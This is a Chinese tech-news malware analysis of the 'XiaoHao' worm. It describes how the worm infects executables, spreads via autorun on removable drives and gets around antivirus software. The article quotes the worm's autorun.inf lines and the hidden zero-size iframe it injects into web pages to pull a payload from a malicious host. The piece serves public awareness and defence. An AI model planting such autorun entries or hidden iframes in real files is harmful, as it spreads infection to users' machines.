【IT168  资讯】网络病毒风波是一波未平一波又起，就在“熊猫烧香”与“AV终结者”风潮刚过不久，又一款蠕虫病毒“小浩”（Worm/XiaoHao.a），再次在网络中逞强。两种病毒都是以感染EXE可执行程序为手段，并且通过网络及第三方存储设备传播，其发作形式也几近类似。

    “小浩”（Worm/XiaoHao.a）病毒简介
    由于该病毒采用的是覆盖式写入，被“小浩”病毒感染破坏后的EXE文件将无法修复，并且该病毒母进程还会创建iexplore.exe 子进程，利用多个系统漏洞下载木马病毒，肆意破坏计算机安全，而且系统被感染后，将自动修改时间为2005年1月17日或是1987年，使一些杀毒软件的使用授权失效，如果遇上不能被关闭的杀软，病毒将会尝试模拟鼠标操作，绕过杀毒软件的主动防御功能，比“熊猫烧香”在某种意义上讲更难对付。
    病毒名称：Worm/XiaoHao.a
    中 文 名：小浩蠕虫
    病毒类型：蠕虫
    危害等级：★★★★
    影响平台：Win 9X/ME/NT/2000/XP/2003

    病毒运行原理
    “小浩” 蠕虫病毒是由Visual C++6.0 工具编写而成，经过UPX工具加壳处理生成程序隐匿性。病毒在感染运行后，将在被感染计算机中的每个硬盘根目录下释放两个病毒文件：第一、字节长度为402706字节的c:\xiaohao.exe可执行文件；第二、外配一个自启动文件其字节长度为91字节，生成c:\autorun.inf，以达利用计算机在启动时，自动查找根目录下的inf文件，以达自动运行的目的，其inf文件内容如下：
    [Autorun]
    open=Xiaohao.exe
    shellexecute=Xiaohao.exe
    shell\Auto\command=Xiaohao.exe
    当“小浩”病毒驻扎进入系统平台后，会自动搜索硬盘中扩展名为exe 的文件，并将自身病毒体写入其中，形成独具特色的“浩”字图标感染式，（注：此点与“熊猫烧香”病毒感染所造成的图标原理一样）。病毒在用户在毫不知情的情况下，利用系统平台的自动播放功能借助第三方存储设备进行传播。

    同时“小浩”病毒还会搜索硬盘中扩展名为：htm、html、asp、aspx、jsp、php等网页文件，并在其中插入<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>一段代码，以达用户在打开正常页面时，被转向到恶意链接页面并利用系统漏洞下载执行病毒源体。当用户浏览被“小浩”病毒感染的文件窗口时，该窗口标题栏出现已中毒 X14o-H4o's Virus 的字样。

    最后“小浩”蠕虫病毒会将系统平台中未被感染的文件属性设置成隐藏，并破坏注册表相关键值，使其不能显示隐藏文件，随即生成一个c:\Jilu.txt病毒日志文件，记录被感染的文件和被隐藏的文件，其破坏严重影响了电脑的正常使用。